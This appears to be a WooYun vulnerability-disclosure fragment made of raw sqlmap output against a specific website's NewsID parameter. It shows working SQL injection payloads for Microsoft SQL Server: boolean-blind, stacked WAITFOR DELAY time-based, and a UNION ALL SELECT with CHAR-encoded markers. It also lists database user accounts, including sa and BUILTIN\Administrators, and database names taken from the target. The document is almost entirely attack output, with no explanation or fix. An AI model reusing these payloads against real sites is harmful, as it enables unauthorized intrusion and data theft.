WooYun.org

[*] data=[{u'status': 1, u'type': 0, u'value': [{u'dbms': [u'Microsoft SQL Server', u'Sybase'], u'suffix': u'', u'clause': [1], u'ptype': 1, u'dbms_version': None, u'prefix': u'', u'place': u'GET', u'data': {u'1': {u'comment': u'', u'matchRatio': 0.614, u'title': u'AND boolean-based blind - WHERE or HAVING clause', u'templatePayload': None, u'vector': u'AND [INFERENCE]', u'where': 1, u'payload': u'NewsID=1042 AND 1586=1586&AreaID=8&BigClassID=17&SpecialID=0'}, u'4': {u'comment': u'--', u'matchRatio': 0.614, u'title': u'Microsoft SQL Server/Sybase stacked queries (comment)', u'templatePayload': None, u'vector': u";IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'", u'where': 1, u'payload': u"NewsID=1042;WAITFOR DELAY '0:0:[SLEEPTIME]'--&AreaID=8&BigClassID=17&SpecialID=0"}, u'6': {u'comment': u'-- ', u'matchRatio': 0.614, u'title': u'Generic UNION query (NULL) - 1 to 20 columns', u'templatePayload': None, u'vector': [5, 26, u'-- ', u'', u'', u'NULL', 2, False, False], u'where': 2, u'payload': u'NewsID=-2535 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(106)+CHAR(107)+CHAR(113)+CHAR(67)+CHAR(117)+CHAR(77)+CHAR(101)+CHAR(100)+CHAR(69)+CHAR(104)+CHAR(77)+CHAR(114)+CHAR(74)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &AreaID=8&BigClassID=17&SpecialID=0'}}, u'conf': {u'string': None, u'notString': None, u'titles': False, u'regexp': None, u'textOnly': False, u'optimize': False}, u'parameter': u'NewsID', u'os': u'Windows'}]}, 
用户
{u'status': 1, u'type': 7, u'value': [u'BUILTIN\\\\Administrators', u'ggk', u'h154192', u'sa', u'yfgh']}, 
数据库
{u'status': 1, u'type': 11, u'value': [u'ggktest', u'master', u'model', u'msdb', u'Northwind', u'pubs', u'tempdb', u'yfgh']}]